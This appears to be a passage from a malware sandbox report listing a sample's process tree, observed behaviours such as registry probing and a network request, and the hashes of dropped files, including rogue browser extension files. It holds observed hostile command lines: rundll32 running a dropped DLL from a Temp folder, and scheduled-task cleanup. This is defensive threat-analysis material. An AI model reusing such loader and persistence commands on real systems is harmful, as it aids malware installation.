C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\GfKYHGpV\lcKhGjL.dll",#1 /hGsite_iddLc 3851211⤵PID:2572
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\GfKYHGpV\lcKhGjL.dll",#1 /hGsite_iddLc 3851212⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:548 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRVNJXEqUfFueAuNO"3⤵PID:5104
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0df1997911c5675b8b76c65598fca4f
SHA14fc399485fc3486d2a3a09c2690d176077f97561
SHA256758b1d59d4eeeab934b0cf7ec1d71871a461b135380ffc9bf733d419f9cd2ef6
SHA512bf5841ac53120f6ed88560f12f575deccb5173d7bdb039201e40c5b37a37353136f849ace3511e4e12dd542025f3eb0594b5473a9898c74315774c2a2fb5d0ef
-
Filesize
2KB
MD54933092fce5052a88768020355843ffe
SHA1ea0ec109e988a37c4ada1de7d28ea5cb25bc9cc6
SHA256ce6b142cdc6757a309e342e4aad0ca3531dea007c02b2ad89e79159e3d7bb247
SHA51276e8d50df71e383baf077a3bd2e1bc9180f91912dcf96838e98c115567b7f3ba3c661003a2e5223a23b40d50bd12e7fb088d4ea1967be82eb2c19a077a5dffce
-
Filesize
2KB
MD52c0cc8d5bdc92c29f1c3814b9617bbbd
SHA19f33ff20fd7a370bc97bf59467888c6af4ed59a5
SHA2561f40a69ce2d842db995dfa6debc954525f65759d310ce1b77c9bb18b12a2047d
SHA512ae39f36bd597d2cbe6aa0cedfc1b752b37312322ff97f756e1f141e0303bfe342b118891155ec7644b8582779c75224a918ca28b976c63686ce2e6bbb98e82fa
-
Filesize
2KB
MD5060f8ccd33dad8f0331148b7c1569d2b
SHA1774ec8e3f0517dc5691e78b9ba56c1eeaf7ab224
SHA256c648769431b39c6e27b93db8ccde8ad9be0221e65688b1d5e58c24e7d4431a00
SHA512558c58d934cef03d5c89d4f7dce5a4e45706cf667de0661b56cd195ae3d21993dabacc017caf62c6537568119df7f7368d85b294b644b59d655e49d725ac65b8
-
Filesize
1.1MB
MD523605eb4be1df24de428d0ec3b807eb8
SHA13fbe393a3625948608c16aaf2e700c2ce7a2c2d0
SHA2568de4f9ff234c2c00bc60df43b9adf6832c3cf74c22de4c54558d61d58a1e9bb2
SHA51281a623be35dbc0a7ddb9bef7409728c039bd7e252fa54940105cd7aa333c944cd4f5ea61eaaee09768e900b0bae2ebba2a699875a803ee4c758a5186ff0ff128
-
Filesize
2KB
MD5ab81c5103292623eee6b2c53d9b0c456
SHA15935e8fabc3d5fe614f86d75426785f26f5e8d70
SHA2568e3d92cc8af52518edb7d0f62fa609561828ccbf7efbffbb793d12ccc75d400b
SHA5127f71611f3e1384e54d4592d28dc8663a522db66b4295689bb7fbac61691ab1973e087874fcfc42eb8d80f5f0e6a1295dd8a43f5942005b27ec1e1612877f6c9b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5ffe33cb1bc53ff66b8169b8d7a66f1e3
SHA1eb40c786de7c62c692acace4aa087acdd8417a1e
SHA256f04fa8cf235a4f92435dc6107ef0f02f04bb892f8315f5623baee3187d0cc5c3
SHA5123dc80456ad3bb6172e35b8c5a5fd99cda58a0aa5b9144e880e9aef8bd41f89c8140de1b2437251652d3c9eaccdbd12cf3360da4f056108bcfb0d89c6b54523ff
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5dabf881c27e46f11c0fd71174601fb31
SHA1415a3127b66c277dc973ef16bec499bf59b8a517
SHA2562de3d43656cac17862241ee5da7a89a72aaf391d024e65f7cde7eff330933070
SHA5127fb8b902c7e04417b22431b4da6ad34995946388759aaf4cdee6b2f2b5ef83164677db5718f342de51cf2114a2b06694bf78173b5be756c5485cf091445ef697
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.1MB
MD5f30d53fcffa213bac1458e37e5137fa5
SHA1dcb9040e05b192c00ba2aee61efc8d856eaa4012
SHA2562474b3d1e0428a07b9739760014633a0edfd62281a632e3fd4c98101144b84ce
SHA512912e7135bc87c38b2c4a084b74ab231f46433fef476d5087c1bfac9e1ac7a8b4c9c66fcdb27aecfed6da4345f67271ffedf1ce784ba535b7d6ccae7b91960940
-
Filesize
6.1MB
MD5f30d53fcffa213bac1458e37e5137fa5
SHA1dcb9040e05b192c00ba2aee61efc8d856eaa4012
SHA2562474b3d1e0428a07b9739760014633a0edfd62281a632e3fd4c98101144b84ce
SHA512912e7135bc87c38b2c4a084b74ab231f46433fef476d5087c1bfac9e1ac7a8b4c9c66fcdb27aecfed6da4345f67271ffedf1ce784ba535b7d6ccae7b91960940
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD56f11da81e9a5ca6765012c6f9c1d7dec
SHA14d083d7024a458b3ee16c722033ea1a0bb8329bb
SHA25684a8c470f7058d1189821fbd776e22ae36b8bbcc5c92349ae083061f1b899c01
SHA5127d677cb3c1bb6b24ba4d95107121c3696464b555d685126a16ddf0dc507a472c04ed6af2499a3411c279628501eaf756070bb389f1e29d5e277d4c32f1768562
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5368a44cb54325aaff505e68dfb624944
SHA19f7e8bd5773028beee767c179ad3e384311f4cfb
SHA2562ee07e12ee3d5378a11809f5fefd6d009b29830f60f285cfa527fc411a524b18
SHA51204be919ceb8306c1a42966d80c073f7e709e7469a9ce2980883014ec4227a45889362ab91c1d9cd9d1d5744d171e23087787091daf37c3e5e72c2945d9b28bba
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6KB
MD54e1a83e7759073d56e258b4a910cf62e
SHA11db40e06606e1d51dda2459df44bfa638770f2f9
SHA256bd9a49eaf39752f8fe63ede63738e3f03c5f7c6ab2ee1ea4e6f11b057e788b29
SHA5120dbaf9bb84b49661881dc463c5f508da01a3d75fbf0385171f64a13c3eea332396e02c95bd037dfbda20f12e0a63c739077b2cab2f2f2be8683122a0af90b482
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732